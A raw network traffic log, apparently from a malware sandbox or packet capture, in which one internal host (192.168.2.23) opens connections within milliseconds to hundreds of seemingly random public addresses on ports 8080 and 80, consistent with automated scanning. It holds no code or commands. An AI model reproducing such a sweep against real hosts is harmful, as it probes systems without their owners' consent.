                                                              Nov 13, 2023 22:17:58.735522032 CET139488080192.168.2.2395.32.108.55
                                                              Nov 13, 2023 22:17:58.735523939 CET139488080192.168.2.2362.196.58.59
                                                              Nov 13, 2023 22:17:58.735526085 CET139488080192.168.2.2385.186.236.241
                                                              Nov 13, 2023 22:17:58.735523939 CET139488080192.168.2.2395.235.247.179
                                                              Nov 13, 2023 22:17:58.735523939 CET1343680192.168.2.2388.79.98.174
                                                              Nov 13, 2023 22:17:58.735537052 CET139488080192.168.2.2331.22.63.157
                                                              Nov 13, 2023 22:17:58.735543966 CET139488080192.168.2.2394.199.87.198
                                                              Nov 13, 2023 22:17:58.735543966 CET139488080192.168.2.2331.102.180.198
                                                              Nov 13, 2023 22:17:58.735544920 CET139488080192.168.2.2385.102.4.250
                                                              Nov 13, 2023 22:17:58.735549927 CET139488080192.168.2.2385.234.105.174
                                                              Nov 13, 2023 22:17:58.735549927 CET139488080192.168.2.2331.52.145.226
                                                              Nov 13, 2023 22:17:58.735555887 CET139488080192.168.2.2394.224.225.90
                                                              Nov 13, 2023 22:17:58.735560894 CET139488080192.168.2.2394.138.16.192
                                                              Nov 13, 2023 22:17:58.735560894 CET139488080192.168.2.2331.30.94.122
                                                              Nov 13, 2023 22:17:58.735563993 CET139488080192.168.2.2395.165.55.154
                                                              Nov 13, 2023 22:17:58.735564947 CET139488080192.168.2.2331.167.69.189
                                                              Nov 13, 2023 22:17:58.735564947 CET139488080192.168.2.2385.198.151.122
                                                              Nov 13, 2023 22:17:58.735584021 CET139488080192.168.2.2331.88.199.154
                                                              Nov 13, 2023 22:17:58.735584021 CET139488080192.168.2.2331.20.116.181
                                                              Nov 13, 2023 22:17:58.735588074 CET139488080192.168.2.2385.172.156.0
                                                              Nov 13, 2023 22:17:58.735588074 CET139488080192.168.2.2395.52.103.128
                                                              Nov 13, 2023 22:17:58.735588074 CET139488080192.168.2.2394.4.113.101
                                                              Nov 13, 2023 22:17:58.735599041 CET139488080192.168.2.2385.41.126.240
                                                              Nov 13, 2023 22:17:58.735603094 CET139488080192.168.2.2385.192.61.239
                                                              Nov 13, 2023 22:17:58.735603094 CET139488080192.168.2.2331.181.219.244
                                                              Nov 13, 2023 22:17:58.735614061 CET139488080192.168.2.2394.222.14.17
                                                              Nov 13, 2023 22:17:58.735618114 CET139488080192.168.2.2394.163.54.97
                                                              Nov 13, 2023 22:17:58.735630035 CET139488080192.168.2.2395.2.120.146
                                                              Nov 13, 2023 22:17:58.735635996 CET139488080192.168.2.2395.213.218.234
                                                              Nov 13, 2023 22:17:58.735635996 CET139488080192.168.2.2394.107.49.51
                                                              Nov 13, 2023 22:17:58.735646963 CET139488080192.168.2.2394.185.102.88
                                                              Nov 13, 2023 22:17:58.735661983 CET139488080192.168.2.2362.100.144.182
                                                              Nov 13, 2023 22:17:58.735663891 CET139488080192.168.2.2362.70.201.133
                                                              Nov 13, 2023 22:17:58.735665083 CET139488080192.168.2.2395.39.240.108
                                                              Nov 13, 2023 22:17:58.735665083 CET139488080192.168.2.2385.221.205.170
                                                              Nov 13, 2023 22:17:58.735680103 CET139488080192.168.2.2331.160.130.59
                                                              Nov 13, 2023 22:17:58.735681057 CET139488080192.168.2.2394.227.48.245
                                                              Nov 13, 2023 22:17:58.735681057 CET139488080192.168.2.2331.118.244.217
                                                              Nov 13, 2023 22:17:58.735682964 CET139488080192.168.2.2394.55.24.156
                                                              Nov 13, 2023 22:17:58.735697031 CET139488080192.168.2.2395.35.136.195
                                                              Nov 13, 2023 22:17:58.735701084 CET139488080192.168.2.2331.138.155.95
                                                              Nov 13, 2023 22:17:58.735702991 CET139488080192.168.2.2385.48.250.10
                                                              Nov 13, 2023 22:17:58.735702991 CET139488080192.168.2.2394.123.132.126
                                                              Nov 13, 2023 22:17:58.735717058 CET139488080192.168.2.2362.248.230.158
                                                              Nov 13, 2023 22:17:58.735719919 CET139488080192.168.2.2362.52.241.51
                                                              Nov 13, 2023 22:17:58.735722065 CET139488080192.168.2.2331.225.197.100
                                                              Nov 13, 2023 22:17:58.735722065 CET139488080192.168.2.2331.142.20.102
                                                              Nov 13, 2023 22:17:58.735723972 CET139488080192.168.2.2394.73.212.196
                                                              Nov 13, 2023 22:17:58.735740900 CET139488080192.168.2.2395.69.135.69
                                                              Nov 13, 2023 22:17:58.735742092 CET139488080192.168.2.2395.155.7.129
                                                              Nov 13, 2023 22:17:58.735742092 CET139488080192.168.2.2385.221.118.193
                                                              Nov 13, 2023 22:17:58.735742092 CET139488080192.168.2.2394.146.139.231
                                                              Nov 13, 2023 22:17:58.735742092 CET139488080192.168.2.2331.131.93.102
                                                              Nov 13, 2023 22:17:58.735754967 CET139488080192.168.2.2395.15.63.137
                                                              Nov 13, 2023 22:17:58.735755920 CET139488080192.168.2.2395.159.133.50
                                                              Nov 13, 2023 22:17:58.735759974 CET139488080192.168.2.2362.187.127.209
                                                              Nov 13, 2023 22:17:58.735774994 CET139488080192.168.2.2394.237.228.191
                                                              Nov 13, 2023 22:17:58.735774994 CET139488080192.168.2.2395.10.126.98
                                                              Nov 13, 2023 22:17:58.735778093 CET139488080192.168.2.2394.219.47.10
                                                              Nov 13, 2023 22:17:58.735778093 CET139488080192.168.2.2362.119.145.71
                                                              Nov 13, 2023 22:17:58.735778093 CET139488080192.168.2.2331.12.251.242
                                                              Nov 13, 2023 22:17:58.735789061 CET139488080192.168.2.2395.210.187.232
                                                              Nov 13, 2023 22:17:58.735799074 CET139488080192.168.2.2331.157.170.36
                                                              Nov 13, 2023 22:17:58.735805988 CET139488080192.168.2.2331.252.173.147
                                                              Nov 13, 2023 22:17:58.735805988 CET139488080192.168.2.2362.53.196.100
                                                              Nov 13, 2023 22:17:58.735811949 CET139488080192.168.2.2394.28.220.155
                                                              Nov 13, 2023 22:17:58.735827923 CET139488080192.168.2.2395.101.214.89
                                                              Nov 13, 2023 22:17:58.735833883 CET139488080192.168.2.2395.68.170.146
                                                              Nov 13, 2023 22:17:58.735836029 CET139488080192.168.2.2395.47.9.86
                                                              Nov 13, 2023 22:17:58.735836029 CET139488080192.168.2.2395.113.151.159
                                                              Nov 13, 2023 22:17:58.735836029 CET139488080192.168.2.2331.110.215.12
                                                              Nov 13, 2023 22:17:58.735836029 CET139488080192.168.2.2395.57.196.190
                                                              Nov 13, 2023 22:17:58.735842943 CET139488080192.168.2.2394.103.78.217
                                                              Nov 13, 2023 22:17:58.735852957 CET139488080192.168.2.2395.248.175.0
                                                              Nov 13, 2023 22:17:58.735855103 CET139488080192.168.2.2362.103.126.171
                                                              Nov 13, 2023 22:17:58.735857010 CET139488080192.168.2.2394.58.212.11
                                                              Nov 13, 2023 22:17:58.735871077 CET139488080192.168.2.2385.92.34.202
                                                              Nov 13, 2023 22:17:58.735872030 CET139488080192.168.2.2395.140.18.20
                                                              Nov 13, 2023 22:17:58.735882998 CET139488080192.168.2.2331.18.143.210
                                                              Nov 13, 2023 22:17:58.735893965 CET139488080192.168.2.2395.88.69.20
                                                              Nov 13, 2023 22:17:58.735893965 CET139488080192.168.2.2395.144.31.157
                                                              Nov 13, 2023 22:17:58.735896111 CET139488080192.168.2.2395.12.22.66
                                                              Nov 13, 2023 22:17:58.735915899 CET139488080192.168.2.2385.35.221.184
                                                              Nov 13, 2023 22:17:58.735922098 CET139488080192.168.2.2385.251.195.220
                                                              Nov 13, 2023 22:17:58.735922098 CET139488080192.168.2.2362.9.179.10
                                                              Nov 13, 2023 22:17:58.735923052 CET139488080192.168.2.2331.13.80.180
                                                              Nov 13, 2023 22:17:58.735922098 CET139488080192.168.2.2385.193.73.83
                                                              Nov 13, 2023 22:17:58.735922098 CET139488080192.168.2.2394.55.19.233
                                                              Nov 13, 2023 22:17:58.735922098 CET139488080192.168.2.2394.8.198.4
                                                              Nov 13, 2023 22:17:58.735925913 CET139488080192.168.2.2331.240.7.151
                                                              Nov 13, 2023 22:17:58.735925913 CET139488080192.168.2.2362.236.60.211
                                                              Nov 13, 2023 22:17:58.735927105 CET139488080192.168.2.2385.247.56.102
                                                              Nov 13, 2023 22:17:58.735925913 CET139488080192.168.2.2331.157.173.4
                                                              Nov 13, 2023 22:17:58.735927105 CET139488080192.168.2.2331.174.218.233
                                                              Nov 13, 2023 22:17:58.735939980 CET139488080192.168.2.2362.64.45.244
                                                              Nov 13, 2023 22:17:58.735950947 CET139488080192.168.2.2385.145.131.246
                                                              Nov 13, 2023 22:17:58.735954046 CET139488080192.168.2.2385.19.144.160
                                                              Nov 13, 2023 22:17:58.735955954 CET139488080192.168.2.2385.3.200.32
                                                              Nov 13, 2023 22:17:58.735955954 CET139488080192.168.2.2362.16.161.76
                                                              Nov 13, 2023 22:17:58.735965014 CET139488080192.168.2.2395.124.129.113
                                                              Nov 13, 2023 22:17:58.735966921 CET139488080192.168.2.2331.234.21.79
                                                              Nov 13, 2023 22:17:58.735970974 CET139488080192.168.2.2395.77.65.232
                                                              Nov 13, 2023 22:17:58.735980034 CET139488080192.168.2.2395.146.157.76
                                                              Nov 13, 2023 22:17:58.735984087 CET139488080192.168.2.2395.227.207.237
                                                              Nov 13, 2023 22:17:58.735987902 CET139488080192.168.2.2385.11.64.39
                                                              Nov 13, 2023 22:17:58.735989094 CET139488080192.168.2.2385.255.67.173
                                                              Nov 13, 2023 22:17:58.735997915 CET139488080192.168.2.2362.148.103.73
                                                              Nov 13, 2023 22:17:58.736001015 CET139488080192.168.2.2362.235.7.19
                                                              Nov 13, 2023 22:17:58.736001015 CET139488080192.168.2.2331.226.173.209
                                                              Nov 13, 2023 22:17:58.736001015 CET139488080192.168.2.2362.52.15.69
                                                              Nov 13, 2023 22:17:58.736015081 CET139488080192.168.2.2394.50.66.254
                                                              Nov 13, 2023 22:17:58.736017942 CET139488080192.168.2.2394.118.222.44
                                                              Nov 13, 2023 22:17:58.736017942 CET139488080192.168.2.2362.246.212.251
                                                              Nov 13, 2023 22:17:58.736021996 CET139488080192.168.2.2394.228.82.197
                                                              Nov 13, 2023 22:17:58.736022949 CET139488080192.168.2.2395.74.150.191
                                                              Nov 13, 2023 22:17:58.736021996 CET139488080192.168.2.2395.177.195.5
                                                              Nov 13, 2023 22:17:58.736021996 CET139488080192.168.2.2394.161.32.88
                                                              Nov 13, 2023 22:17:58.736040115 CET139488080192.168.2.2394.150.40.131
                                                              Nov 13, 2023 22:17:58.736041069 CET139488080192.168.2.2394.44.143.227
                                                              Nov 13, 2023 22:17:58.736040115 CET139488080192.168.2.2331.4.250.242
                                                              Nov 13, 2023 22:17:58.736067057 CET139488080192.168.2.2385.146.237.103
                                                              Nov 13, 2023 22:17:58.736076117 CET139488080192.168.2.2331.72.183.248
                                                              Nov 13, 2023 22:17:58.736076117 CET139488080192.168.2.2385.229.131.240
                                                              Nov 13, 2023 22:17:58.736088037 CET139488080192.168.2.2395.46.15.92
                                                              Nov 13, 2023 22:17:58.736114979 CET139488080192.168.2.2395.244.20.37
                                                              Nov 13, 2023 22:17:58.736135960 CET139488080192.168.2.2362.254.58.36
                                                              Nov 13, 2023 22:17:58.736157894 CET139488080192.168.2.2394.124.29.216
                                                              Nov 13, 2023 22:17:58.736160040 CET139488080192.168.2.2395.155.111.184
                                                              Nov 13, 2023 22:17:58.736159086 CET139488080192.168.2.2331.62.171.60
                                                              Nov 13, 2023 22:17:58.736159086 CET139488080192.168.2.2394.111.130.202
                                                              Nov 13, 2023 22:17:58.736160994 CET139488080192.168.2.2331.225.185.245
                                                              Nov 13, 2023 22:17:58.736160994 CET139488080192.168.2.2385.237.3.111
                                                              Nov 13, 2023 22:17:58.736160994 CET139488080192.168.2.2331.110.99.239
                                                              Nov 13, 2023 22:17:58.736160994 CET139488080192.168.2.2362.244.72.108
                                                              Nov 13, 2023 22:17:58.736160994 CET139488080192.168.2.2394.25.83.43
                                                              Nov 13, 2023 22:17:58.736160994 CET139488080192.168.2.2385.22.146.189
                                                              Nov 13, 2023 22:17:58.736160994 CET139488080192.168.2.2331.91.238.81
                                                              Nov 13, 2023 22:17:58.736171961 CET139488080192.168.2.2395.189.198.56
                                                              Nov 13, 2023 22:17:58.736175060 CET139488080192.168.2.2394.61.129.90
                                                              Nov 13, 2023 22:17:58.736175060 CET139488080192.168.2.2362.2.18.69
                                                              Nov 13, 2023 22:17:58.736186028 CET139488080192.168.2.2385.66.170.105
                                                              Nov 13, 2023 22:17:58.736188889 CET139488080192.168.2.2394.39.114.106
                                                              Nov 13, 2023 22:17:58.736196995 CET139488080192.168.2.2395.143.239.20
                                                              Nov 13, 2023 22:17:58.736207962 CET139488080192.168.2.2331.31.46.40
                                                              Nov 13, 2023 22:17:58.736216068 CET139488080192.168.2.2394.46.105.77
                                                              Nov 13, 2023 22:17:58.736216068 CET139488080192.168.2.2362.15.111.49
                                                              Nov 13, 2023 22:17:58.736216068 CET139488080192.168.2.2385.217.196.173
                                                              Nov 13, 2023 22:17:58.736217022 CET139488080192.168.2.2395.10.229.73
                                                              Nov 13, 2023 22:17:58.736227036 CET139488080192.168.2.2395.68.120.105
                                                              Nov 13, 2023 22:17:58.736227036 CET139488080192.168.2.2331.84.38.132
                                                              Nov 13, 2023 22:17:58.736232996 CET139488080192.168.2.2362.228.226.230
                                                              Nov 13, 2023 22:17:58.736243963 CET139488080192.168.2.2395.213.56.38
                                                              Nov 13, 2023 22:17:58.736246109 CET139488080192.168.2.2362.236.223.80
                                                              Nov 13, 2023 22:17:58.736248970 CET139488080192.168.2.2394.203.210.34
                                                              Nov 13, 2023 22:17:58.736253977 CET139488080192.168.2.2385.233.34.18
                                                              Nov 13, 2023 22:17:58.736257076 CET139488080192.168.2.2362.19.33.106
                                                              Nov 13, 2023 22:17:58.736263037 CET139488080192.168.2.2395.64.174.125
                                                              Nov 13, 2023 22:17:58.736265898 CET139488080192.168.2.2385.101.228.243
                                                              Nov 13, 2023 22:17:58.736265898 CET139488080192.168.2.2395.82.79.133
                                                              Nov 13, 2023 22:17:58.736283064 CET139488080192.168.2.2362.242.17.110
                                                              Nov 13, 2023 22:17:58.736284018 CET139488080192.168.2.2394.84.33.107
                                                              Nov 13, 2023 22:17:58.736284018 CET139488080192.168.2.2394.159.201.147
                                                              Nov 13, 2023 22:17:58.736295938 CET139488080192.168.2.2394.162.54.243
                                                              Nov 13, 2023 22:17:58.736306906 CET139488080192.168.2.2385.219.169.163
                                                              Nov 13, 2023 22:17:58.736306906 CET139488080192.168.2.2362.99.235.19
                                                              Nov 13, 2023 22:17:58.736306906 CET139488080192.168.2.2331.66.46.66
                                                              Nov 13, 2023 22:17:58.736311913 CET139488080192.168.2.2394.199.192.79
                                                              Nov 13, 2023 22:17:58.736315012 CET139488080192.168.2.2362.221.148.254
                                                              Nov 13, 2023 22:17:58.736332893 CET139488080192.168.2.2395.102.207.248
                                                              Nov 13, 2023 22:17:58.736332893 CET139488080192.168.2.2331.56.112.24
                                                              Nov 13, 2023 22:17:58.736335993 CET139488080192.168.2.2394.78.242.71
                                                              Nov 13, 2023 22:17:58.736336946 CET139488080192.168.2.2394.145.130.236
                                                              Nov 13, 2023 22:17:58.736346960 CET139488080192.168.2.2331.204.130.98
                                                              Nov 13, 2023 22:17:58.736349106 CET139488080192.168.2.2331.231.228.255
                                                              Nov 13, 2023 22:17:58.736356974 CET139488080192.168.2.2331.157.46.140
                                                              Nov 13, 2023 22:17:58.736357927 CET139488080192.168.2.2385.117.197.33
                                                              Nov 13, 2023 22:17:58.736358881 CET139488080192.168.2.2395.78.135.79
                                                              Nov 13, 2023 22:17:58.736366034 CET139488080192.168.2.2331.53.5.183
                                                              Nov 13, 2023 22:17:58.736372948 CET139488080192.168.2.2385.39.209.13
                                                              Nov 13, 2023 22:17:58.736372948 CET139488080192.168.2.2331.150.179.55
                                                              Nov 13, 2023 22:17:58.736375093 CET139488080192.168.2.2362.94.70.25
                                                              Nov 13, 2023 22:17:58.736375093 CET139488080192.168.2.2331.217.116.227
                                                              Nov 13, 2023 22:17:58.736387014 CET139488080192.168.2.2385.50.208.34
                                                              Nov 13, 2023 22:17:58.736387968 CET139488080192.168.2.2395.79.251.155
                                                              Nov 13, 2023 22:17:58.736407995 CET139488080192.168.2.2395.146.171.69
                                                              Nov 13, 2023 22:17:58.736407995 CET139488080192.168.2.2385.243.176.153
                                                              Nov 13, 2023 22:17:58.736407995 CET139488080192.168.2.2395.243.92.23
                                                              Nov 13, 2023 22:17:58.736427069 CET139488080192.168.2.2394.111.243.114
                                                              Nov 13, 2023 22:17:58.736427069 CET139488080192.168.2.2394.145.145.54
                                                              Nov 13, 2023 22:17:58.736433029 CET139488080192.168.2.2331.249.26.190
                                                              Nov 13, 2023 22:17:58.736433029 CET139488080192.168.2.2385.196.9.104
                                                              Nov 13, 2023 22:17:58.736433029 CET139488080192.168.2.2394.132.32.1
                                                              Nov 13, 2023 22:17:58.736435890 CET139488080192.168.2.2395.169.104.241
                                                              Nov 13, 2023 22:17:58.736435890 CET139488080192.168.2.2331.252.50.83
                                                              Nov 13, 2023 22:17:58.736437082 CET139488080192.168.2.2331.147.61.30
                                                              Nov 13, 2023 22:17:58.736452103 CET139488080192.168.2.2394.3.84.213
                                                              Nov 13, 2023 22:17:58.736459970 CET139488080192.168.2.2395.210.32.191
                                                              Nov 13, 2023 22:17:58.736459970 CET139488080192.168.2.2394.210.59.131
                                                              Nov 13, 2023 22:17:58.736460924 CET139488080192.168.2.2362.116.38.248
                                                              Nov 13, 2023 22:17:58.736459970 CET139488080192.168.2.2394.48.148.212
                                                              Nov 13, 2023 22:17:58.736460924 CET139488080192.168.2.2395.244.67.131
                                                              Nov 13, 2023 22:17:58.736459970 CET139488080192.168.2.2394.71.107.178
                                                              Nov 13, 2023 22:17:58.736484051 CET139488080192.168.2.2394.196.172.211
                                                              Nov 13, 2023 22:17:58.736484051 CET139488080192.168.2.2394.180.217.39
                                                              Nov 13, 2023 22:17:58.736484051 CET139488080192.168.2.2331.51.63.176
                                                              Nov 13, 2023 22:17:58.736484051 CET139488080192.168.2.2385.215.12.110
                                                              Nov 13, 2023 22:17:58.736485958 CET139488080192.168.2.2394.107.165.110
                                                              Nov 13, 2023 22:17:58.736499071 CET139488080192.168.2.2362.126.6.230
                                                              Nov 13, 2023 22:17:58.736499071 CET139488080192.168.2.2385.91.7.107
                                                              Nov 13, 2023 22:17:58.736500025 CET139488080192.168.2.2395.92.224.50
                                                              Nov 13, 2023 22:17:58.736512899 CET139488080192.168.2.2394.245.166.244
                                                              Nov 13, 2023 22:17:58.736519098 CET139488080192.168.2.2362.206.216.129
                                                              Nov 13, 2023 22:17:58.736521006 CET139488080192.168.2.2331.16.194.225
                                                              Nov 13, 2023 22:17:58.736521959 CET139488080192.168.2.2395.224.112.3
                                                              Nov 13, 2023 22:17:58.736529112 CET139488080192.168.2.2394.166.215.126
                                                              Nov 13, 2023 22:17:58.736535072 CET139488080192.168.2.2394.181.41.229
                                                              Nov 13, 2023 22:17:58.736536980 CET139488080192.168.2.2385.80.99.110
                                                              Nov 13, 2023 22:17:58.736540079 CET139488080192.168.2.2395.75.238.223
                                                              Nov 13, 2023 22:17:58.736550093 CET139488080192.168.2.2331.28.204.3
                                                              Nov 13, 2023 22:17:58.736550093 CET139488080192.168.2.2331.131.12.154
                                                              Nov 13, 2023 22:17:58.736567974 CET139488080192.168.2.2331.110.245.44
                                                              Nov 13, 2023 22:17:58.736567974 CET139488080192.168.2.2394.179.228.216
                                                              Nov 13, 2023 22:17:58.736567974 CET139488080192.168.2.2394.65.213.198
                                                              Nov 13, 2023 22:17:58.736586094 CET139488080192.168.2.2385.139.108.19
                                                              Nov 13, 2023 22:17:58.736589909 CET139488080192.168.2.2394.150.165.15
                                                              Nov 13, 2023 22:17:58.736591101 CET139488080192.168.2.2385.160.81.168
                                                              Nov 13, 2023 22:17:58.736591101 CET139488080192.168.2.2395.119.184.116
                                                              Nov 13, 2023 22:17:58.736593962 CET139488080192.168.2.2395.253.83.14
                                                              Nov 13, 2023 22:17:58.736607075 CET139488080192.168.2.2331.137.7.68
                                                              Nov 13, 2023 22:17:58.736607075 CET139488080192.168.2.2394.117.175.230
                                                              Nov 13, 2023 22:17:58.736612082 CET139488080192.168.2.2385.176.235.54
                                                              Nov 13, 2023 22:17:58.736613035 CET139488080192.168.2.2385.36.164.55
                                                              Nov 13, 2023 22:17:58.736617088 CET139488080192.168.2.2331.215.189.101
                                                              Nov 13, 2023 22:17:58.736633062 CET139488080192.168.2.2394.45.78.69
                                                              Nov 13, 2023 22:17:58.736634016 CET139488080192.168.2.2394.174.50.224
                                                              Nov 13, 2023 22:17:58.736634970 CET139488080192.168.2.2331.111.69.153
                                                              Nov 13, 2023 22:17:58.736634970 CET139488080192.168.2.2331.240.35.105
                                                              Nov 13, 2023 22:17:58.736639977 CET139488080192.168.2.2331.65.174.33
                                                              Nov 13, 2023 22:17:58.736649990 CET139488080192.168.2.2331.126.58.156
                                                              Nov 13, 2023 22:17:58.736649990 CET139488080192.168.2.2362.128.21.225
                                                              Nov 13, 2023 22:17:58.736650944 CET139488080192.168.2.2362.95.46.119
                                                              Nov 13, 2023 22:17:58.736650944 CET139488080192.168.2.2394.75.134.144
                                                              Nov 13, 2023 22:17:58.736666918 CET139488080192.168.2.2385.237.219.171
                                                              Nov 13, 2023 22:17:58.736666918 CET139488080192.168.2.2394.177.118.12
                                                              Nov 13, 2023 22:17:58.736670971 CET139488080192.168.2.2331.135.188.147
                                                              Nov 13, 2023 22:17:58.736690998 CET139488080192.168.2.2395.225.69.51
                                                              Nov 13, 2023 22:17:58.736691952 CET139488080192.168.2.2385.104.129.212
                                                              Nov 13, 2023 22:17:58.736694098 CET139488080192.168.2.2395.67.214.130
                                                              Nov 13, 2023 22:17:58.736701965 CET139488080192.168.2.2331.77.35.179
                                                              Nov 13, 2023 22:17:58.736709118 CET139488080192.168.2.2362.233.252.18
                                                              Nov 13, 2023 22:17:58.736709118 CET139488080192.168.2.2331.162.181.213
                                                              Nov 13, 2023 22:17:58.736709118 CET139488080192.168.2.2331.202.26.46
                                                              Nov 13, 2023 22:17:58.736712933 CET139488080192.168.2.2395.38.161.136
                                                              Nov 13, 2023 22:17:58.736712933 CET139488080192.168.2.2362.197.239.84
                                                              Nov 13, 2023 22:17:58.736713886 CET139488080192.168.2.2395.224.148.245
                                                              Nov 13, 2023 22:17:58.736713886 CET139488080192.168.2.2362.187.103.43
                                                              Nov 13, 2023 22:17:58.736713886 CET139488080192.168.2.2385.249.108.150
                                                              Nov 13, 2023 22:17:58.736721039 CET139488080192.168.2.2331.48.231.196
                                                              Nov 13, 2023 22:17:58.736722946 CET139488080192.168.2.2331.115.103.102
                                                              Nov 13, 2023 22:17:58.736722946 CET139488080192.168.2.2394.137.24.223
                                                              Nov 13, 2023 22:17:58.736731052 CET139488080192.168.2.2385.71.10.156
                                                              Nov 13, 2023 22:17:58.736732960 CET139488080192.168.2.2394.109.0.159
                                                              Nov 13, 2023 22:17:58.736737013 CET139488080192.168.2.2385.52.93.200
                                                              Nov 13, 2023 22:17:58.736742973 CET139488080192.168.2.2385.203.201.196
                                                              Nov 13, 2023 22:17:58.736742973 CET139488080192.168.2.2331.177.119.206
                                                              Nov 13, 2023 22:17:58.736754894 CET139488080192.168.2.2331.114.147.230
                                                              Nov 13, 2023 22:17:58.736757994 CET139488080192.168.2.2395.106.247.159
                                                              Nov 13, 2023 22:17:58.736757994 CET139488080192.168.2.2362.120.67.229
                                                              Nov 13, 2023 22:17:58.736759901 CET139488080192.168.2.2385.193.15.114
                                                              Nov 13, 2023 22:17:58.736763954 CET139488080192.168.2.2394.204.71.204
                                                              Nov 13, 2023 22:17:58.736778975 CET139488080192.168.2.2385.140.150.128
                                                              Nov 13, 2023 22:17:58.736778975 CET139488080192.168.2.2395.104.82.159
                                                              Nov 13, 2023 22:17:58.736782074 CET139488080192.168.2.2331.228.57.205
                                                              Nov 13, 2023 22:17:58.736782074 CET139488080192.168.2.2385.195.92.34
                                                              Nov 13, 2023 22:17:58.736795902 CET139488080192.168.2.2385.123.37.17
                                                              Nov 13, 2023 22:17:58.736798048 CET139488080192.168.2.2394.75.186.82
                                                              Nov 13, 2023 22:17:58.736799002 CET139488080192.168.2.2385.9.74.255
                                                              Nov 13, 2023 22:17:58.736799002 CET139488080192.168.2.2362.13.81.26
                                                              Nov 13, 2023 22:17:58.736799002 CET139488080192.168.2.2394.168.179.49
                                                              Nov 13, 2023 22:17:58.736816883 CET139488080192.168.2.2331.85.72.35
                                                              Nov 13, 2023 22:17:58.736816883 CET139488080192.168.2.2385.217.31.47
                                                              Nov 13, 2023 22:17:58.736824036 CET139488080192.168.2.2331.216.196.146
                                                              Nov 13, 2023 22:17:58.736825943 CET139488080192.168.2.2395.212.53.80
                                                              Nov 13, 2023 22:17:58.736825943 CET139488080192.168.2.2362.134.178.192
                                                              Nov 13, 2023 22:17:58.736829996 CET139488080192.168.2.2395.87.169.110
                                                              Nov 13, 2023 22:17:58.736836910 CET139488080192.168.2.2362.100.130.110
                                                              Nov 13, 2023 22:17:58.736845016 CET139488080192.168.2.2394.206.85.247
                                                              Nov 13, 2023 22:17:58.736865997 CET139488080192.168.2.2385.197.15.189
                                                              Nov 13, 2023 22:17:58.736866951 CET139488080192.168.2.2331.156.253.109
                                                              Nov 13, 2023 22:17:58.736867905 CET139488080192.168.2.2394.111.119.168
                                                              Nov 13, 2023 22:17:58.736872911 CET139488080192.168.2.2331.41.161.126
                                                              Nov 13, 2023 22:17:58.736876965 CET139488080192.168.2.2362.18.22.111
                                                              Nov 13, 2023 22:17:58.736876965 CET139488080192.168.2.2394.216.217.91
                                                              Nov 13, 2023 22:17:58.736876965 CET139488080192.168.2.2394.222.147.61
                                                              Nov 13, 2023 22:17:58.736882925 CET139488080192.168.2.2362.81.29.174
                                                              Nov 13, 2023 22:17:58.736886978 CET139488080192.168.2.2385.220.113.196
                                                              Nov 13, 2023 22:17:58.736887932 CET139488080192.168.2.2362.82.63.163
                                                              Nov 13, 2023 22:17:58.736897945 CET139488080192.168.2.2395.148.31.77
                                                              Nov 13, 2023 22:17:58.736905098 CET139488080192.168.2.2331.29.44.89
                                                              Nov 13, 2023 22:17:58.736906052 CET139488080192.168.2.2362.188.10.146
                                                              Nov 13, 2023 22:17:58.736917973 CET139488080192.168.2.2362.28.135.17
                                                              Nov 13, 2023 22:17:58.736920118 CET139488080192.168.2.2394.31.34.83
                                                              Nov 13, 2023 22:17:58.736922026 CET139488080192.168.2.2385.116.30.9
                                                              Nov 13, 2023 22:17:58.736922026 CET139488080192.168.2.2385.98.215.216
                                                              Nov 13, 2023 22:17:58.736927032 CET139488080192.168.2.2362.42.99.221
                                                              Nov 13, 2023 22:17:58.736931086 CET139488080192.168.2.2394.43.56.217
                                                              Nov 13, 2023 22:17:58.736936092 CET139488080192.168.2.2395.65.69.148
                                                              Nov 13, 2023 22:17:58.736936092 CET139488080192.168.2.2331.138.106.129
                                                              Nov 13, 2023 22:17:58.736938953 CET139488080192.168.2.2362.155.153.210
                                                              Nov 13, 2023 22:17:58.736941099 CET139488080192.168.2.2362.169.81.237
                                                              Nov 13, 2023 22:17:58.736944914 CET139488080192.168.2.2385.27.96.238
                                                              Nov 13, 2023 22:17:58.736949921 CET139488080192.168.2.2362.229.135.102
                                                              Nov 13, 2023 22:17:58.736955881 CET139488080192.168.2.2385.125.56.219
                                                              Nov 13, 2023 22:17:58.736968040 CET139488080192.168.2.2395.105.180.46
                                                              Nov 13, 2023 22:17:58.736969948 CET139488080192.168.2.2362.154.144.77
                                                              Nov 13, 2023 22:17:58.736970901 CET139488080192.168.2.2331.52.196.48
                                                              Nov 13, 2023 22:17:58.736973047 CET139488080192.168.2.2362.10.58.44
                                                              Nov 13, 2023 22:17:58.736973047 CET139488080192.168.2.2331.214.7.237
                                                              Nov 13, 2023 22:17:58.736979961 CET139488080192.168.2.2385.26.217.44
                                                              Nov 13, 2023 22:17:58.736980915 CET139488080192.168.2.2362.163.197.125
                                                              Nov 13, 2023 22:17:58.736980915 CET139488080192.168.2.2394.93.102.15
                                                              Nov 13, 2023 22:17:58.736994982 CET139488080192.168.2.2331.243.77.26
                                                              Nov 13, 2023 22:17:58.736999989 CET139488080192.168.2.2362.72.209.118
                                                              Nov 13, 2023 22:17:58.737000942 CET139488080192.168.2.2385.42.71.63
                                                              Nov 13, 2023 22:17:58.737000942 CET139488080192.168.2.2362.74.225.138
                                                              Nov 13, 2023 22:17:58.737000942 CET139488080192.168.2.2394.137.238.128
                                                              Nov 13, 2023 22:17:58.737015009 CET139488080192.168.2.2395.13.237.107
                                                              Nov 13, 2023 22:17:58.737015009 CET139488080192.168.2.2331.210.78.185
                                                              Nov 13, 2023 22:17:58.737030983 CET139488080192.168.2.2362.39.148.21
                                                              Nov 13, 2023 22:17:58.737036943 CET139488080192.168.2.2395.29.70.220
                                                              Nov 13, 2023 22:17:58.737036943 CET139488080192.168.2.2331.25.199.217
                                                              Nov 13, 2023 22:17:58.737037897 CET139488080192.168.2.2331.106.21.231
                                                              Nov 13, 2023 22:17:58.737037897 CET139488080192.168.2.2362.250.0.22
                                                              Nov 13, 2023 22:17:58.737036943 CET139488080192.168.2.2394.190.108.140
                                                              Nov 13, 2023 22:17:58.737036943 CET139488080192.168.2.2385.63.255.197
                                                              Nov 13, 2023 22:17:58.737042904 CET139488080192.168.2.2362.191.204.158
                                                              Nov 13, 2023 22:17:58.737055063 CET139488080192.168.2.2331.201.142.213
                                                              Nov 13, 2023 22:17:58.737059116 CET139488080192.168.2.2385.35.103.241
                                                              Nov 13, 2023 22:17:58.737059116 CET139488080192.168.2.2331.189.110.33
                                                              Nov 13, 2023 22:17:58.737061977 CET139488080192.168.2.2362.113.229.36
